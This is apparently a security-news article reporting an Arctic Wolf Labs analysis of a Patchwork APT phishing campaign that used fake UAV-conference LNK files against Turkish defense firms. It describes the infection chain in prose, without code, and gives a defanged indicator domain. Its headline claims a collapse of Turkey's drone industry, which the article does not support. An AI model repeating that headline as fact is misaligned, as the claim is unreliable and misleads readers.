One Email — and Turkey’s Billion-Dollar Drone Empire Collapsed in 30 Seconds
How Patchwork hackers looted the defense sector through a fake conference
How Patchwork hackers looted the defense sector through a fake conference
The hacking group Patchwork — also known by aliases such as APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson — has launched a new targeted phishing campaign aimed at Turkey’s defense sector. According to analysts, the attackers were seeking sensitive information related to the development of drone platforms and hypersonic weapons.
According to Arctic Wolf Labs, the malicious attack chain consists of five stages and begins with the distribution of Windows LNK shortcut files, disguised as invitations to an international UAV technology conference. These phishing emails were sent to employees at Turkish defense contractors, including a manufacturer of high-precision missile systems.
The geopolitical backdrop makes this attack particularly significant: it coincides with intensified military-technical cooperation between Turkey and Pakistan, and rising tensions between Pakistan and India. Analysts believe that Patchwork operates in the interests of the Indian state and has systematically targeted political and military entities in South Asia since 2009.
Earlier in 2025, the same group conducted a campaign against Chinese universities, using energy-related documents as lures. That campaign employed a Rust-based loader that decrypted and executed a C# Trojan named Protego, which was designed to harvest data from infected machines.
The current attack on Turkish defense firms once again employs LNK files embedding PowerShell commands. These scripts establish a connection to a remote server — expouav[.]org, a domain registered on June 25, 2025, used to deliver the malicious payload. In addition to malware, the site contains a PDF file mimicking conference materials, referencing a legitimate event hosted on the WASET platform. This convincingly distracts the user while the malicious code executes in the background.
Subsequent steps lead to the download of a malicious DLL that is executed via DLL side-loading, where a legitimate component in a trusted process is replaced. Execution is initiated via a scheduled Windows task, which launches embedded shellcode. This module performs reconnaissance, collecting system data, taking screenshots, and sending the information back to a C2 server.
A notable feature of this operation is the use of 32-bit PE files, in contrast to the previously used 64-bit DLLs. This shift reflects a technical evolution aimed at better stealth: compact x86 binaries are easier to embed in trusted processes, and the change in architecture complicates automated detection.
Researchers also noted infrastructure overlaps with the DoNot Team (APT-Q-38, Bellyworm), suggesting possible tactical or logistical cooperation between the two India-linked APT clusters.
The campaign targeting Turkey’s defense industry marks an expansion of Patchwork’s focus beyond South Asia. Given Turkey’s dominant role in the global drone export market (accounting for roughly 65% of global UAV exports) and its ambitions in hypersonic weapons, the activity of this Indian cyber-espionage group appears to be strategically motivated.
